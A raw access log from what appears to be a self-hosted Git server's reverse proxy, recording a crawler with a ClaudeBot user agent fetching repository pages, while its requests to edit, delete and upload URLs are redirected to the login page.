"/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py" [Client 216.73.216.188] [Length 5009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/html/assets/js" -[15/Feb/2026:12:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 13530] [Gzip 4.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py?display=source" [Client 216.73.216.188] [Length 14294] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3" [Client 216.73.216.188] [Length 11077] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static" [Client 216.73.216.188] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/.Backup/html/components" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/app/fetcher.py" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/.Backup/html/components" -[15/Feb/2026:12:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json" [Client 216.73.216.188] [Length 11264] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/app/fetcher.py" -[15/Feb/2026:12:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py?display=source" [Client 216.73.216.188] [Length 16169] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py" [Client 216.73.216.188] [Length 13634] [Gzip 4.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services" [Client 216.73.216.188] [Length 9919] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components" [Client 216.73.216.188] [Length 10563] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/npm/letsencrypt" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/npm/data/nginx/proxy_host" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/app/fetcher.py" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/npm/letsencrypt" -[15/Feb/2026:12:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/npm/data/nginx/proxy_host" -[15/Feb/2026:12:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/static/css/style.css" [Client 216.73.216.188] [Length 10082] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/app/fetcher.py" -[15/Feb/2026:12:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/css" [Client 216.73.216.188] [Length 10081] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/include/site/python3.12" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js" [Client 216.73.216.188] [Length 10009] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/keys.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/include/site/python3.12" -[15/Feb/2026:12:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/static/css/style.css" [Client 216.73.216.188] [Length 1432] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/keys.json" -[15/Feb/2026:12:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json" [Client 216.73.216.188] [Length 11669] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/static/css/style.css" [Client 216.73.216.188] [Length 18163] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/css/style.css?display=source" [Client 216.73.216.188] [Length 31847] [Gzip 9.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/keys.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" -[15/Feb/2026:12:09:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" -[15/Feb/2026:12:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/keys.json" -[15/Feb/2026:12:09:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/python3.12" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" -[15/Feb/2026:12:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/python3.12" -[15/Feb/2026:12:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components" [Client 216.73.216.188] [Length 10565] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" -[15/Feb/2026:12:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py" [Client 216.73.216.188] [Length 13369] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/python3.12" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/services/geminiService.ts" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/python3.12" -[15/Feb/2026:12:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug" [Client 216.73.216.188] [Length 9811] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/services/geminiService.ts" -[15/Feb/2026:12:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs?display=rendered" [Client 216.73.216.188] [Length 11224] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js" [Client 216.73.216.188] [Length 10010] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/static/js/app.js" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" -[15/Feb/2026:12:09:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/services/geminiService.ts" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/static/js/app.js" -[15/Feb/2026:12:09:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" -[15/Feb/2026:12:09:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/services/geminiService.ts" -[15/Feb/2026:12:09:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/static/js/app.js" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" -[15/Feb/2026:12:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" -[15/Feb/2026:12:09:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/static/js/app.js" -[15/Feb/2026:12:09:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/css/style.css" [Client 216.73.216.188] [Length 31601] [Gzip 9.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" -[15/Feb/2026:12:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/css" [Client 216.73.216.188] [Length 10143] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 